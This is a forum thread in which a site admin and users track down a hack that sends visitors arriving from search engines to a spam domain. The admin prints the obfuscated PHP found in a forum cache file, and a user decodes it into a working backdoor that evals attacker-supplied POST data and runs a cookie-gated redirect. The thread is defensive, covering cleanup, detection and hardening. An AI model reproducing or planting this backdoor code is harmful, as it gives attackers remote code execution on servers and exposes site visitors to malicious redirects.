Jump to content
Annon

RSS Feeds Link Problem

Recommended Posts

I hate that site. I don't use the rss but if you search this site via google, that site shows up very often, like the first click of every search.

Share this post


Link to post
Share on other sites

Yes, it happened to me too, very strange. Is the forum hacked or what?

I am using google reader

Edited by renochew

Share this post


Link to post
Share on other sites

Same, Google Reader.

Just happened to me now, it seems the links expire.

Admins?

Share this post


Link to post
Share on other sites

Hey guys

This was something that used to hit us on the old forum. I believe it's a hack/vulnerability in the software. I fixed the old one, now I'm going to have to track it down again in the new software.

Sorry about that, it will hopefully be fixed soon.

M

  • Like 1

Share this post


Link to post
Share on other sites

Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:


$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
[/CODE]

  • Like 2

Share this post


Link to post
Share on other sites

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

This was also showing for already opened tabs from odforce, with no way to know the address of the thread. I will let you know if I see it again :)

Share this post


Link to post
Share on other sites

I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Is it possible that the webserver itself is rooted via other means? eg. brute force remove root password guessing via ssh

Share this post


Link to post
Share on other sites

Btw I just saw the same problem again. Not sure if I have to update anything but after searching this site on google and clicking the first link, it appeared again. Just FYI :)

Share this post


Link to post
Share on other sites

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

I've researched this quite a lot and this hack is showing up in this forum, wordpress, vbulletin and a bunch of other popular pieces of software out there. Unfortunately there doesn't seem like there's any idea of how it's happening.

Is it possible that the webserver itself is rooted via other means? eg. brute force remove root password guessing via ssh

I've scoured the logs and there's no sign of anyone logging in via ssh other than myself, however it is possible. I suspect they got in through a vulnerability in the software and have left a backdoor somewhere. As you can see by the code I posted above, it's not exactly obvious what to look for. I've found some scripts on the server that allow someone complete access to all the files in the webroot on the server. Scary, but almost impossible to track down.

I'll keep looking though, thanks for letting me know it's back.

M

  • Like 1

Share this post


Link to post
Share on other sites

Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:


$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
[/CODE]

Thank you so much Marc.

I'v got the same problem.

Follow your code, I searched and found file /cache/skin_cache/cacheid_1/skin_global.php is infected. I rebuilt skin and the file is overwritten.

I dont know how hackers can change that file. Could you please give me some advice?

Share this post


Link to post
Share on other sites

I have just decode that script, and get:

$i='ini_set';
if(function_exists($i)){
$i('display_errors',0);
$i('log_errors',0);
}
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$c);
$h=$_SERVER['HTTP_HOST'];
$b=$this-&gt;settings['cookie_id'];
$g=$b.'session_id';
$e=$b.'lang_id';
$d=empty($_SERVER['HTTP_X_MOZ']);
if(empty($_COOKIE[$e])){
if(isset($_GET['ipbv'])&amp;&amp;(!empty($_GET['g']))&amp;&amp;(!empty($_COOKIE[$g]))){
if($c==$h){
if($d)setcookie($e,'en',time()+36000);
$m=substr(md5($h),0,8);
print("document.location='http://url4short.info/{$m}'");
}
exit;}
if((!$u)&amp;&amp;$r){$IPBHTML.="";}
}

Follow above code, the problem will occur after 10 hours (= 36000 / 60 / 60) since the last click from search engine (not just google but yahoo, bing, baidu,...).

We can check 'lang_id' cookies, if it exists (and equal to 'en'), the system may be infected by that virus.

Edited by intefor

Share this post


Link to post
Share on other sites

Hey

Yeah I've managed to track down the problem itself, but sadly I haven't managed to discover the root of the problem (ie the source of infection). My solution to get rid of it was to change the ownership of all my php files/directories to the php user (which is 'nobody' in my case). Happily we're on a VPS, so this works and now no-one has permissions to change any of my files anymore. If you're on a shared server then I don't think this solution would work for you.

But yeah. I don't know how they manage to insert code into the forum cache files. I wish I did, I hate not knowing how they're getting in :).

M

  • Like 2

Share this post


Link to post
Share on other sites

Thanks Marc, I stopped seeing the issue long ago, so whatever you did works :)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×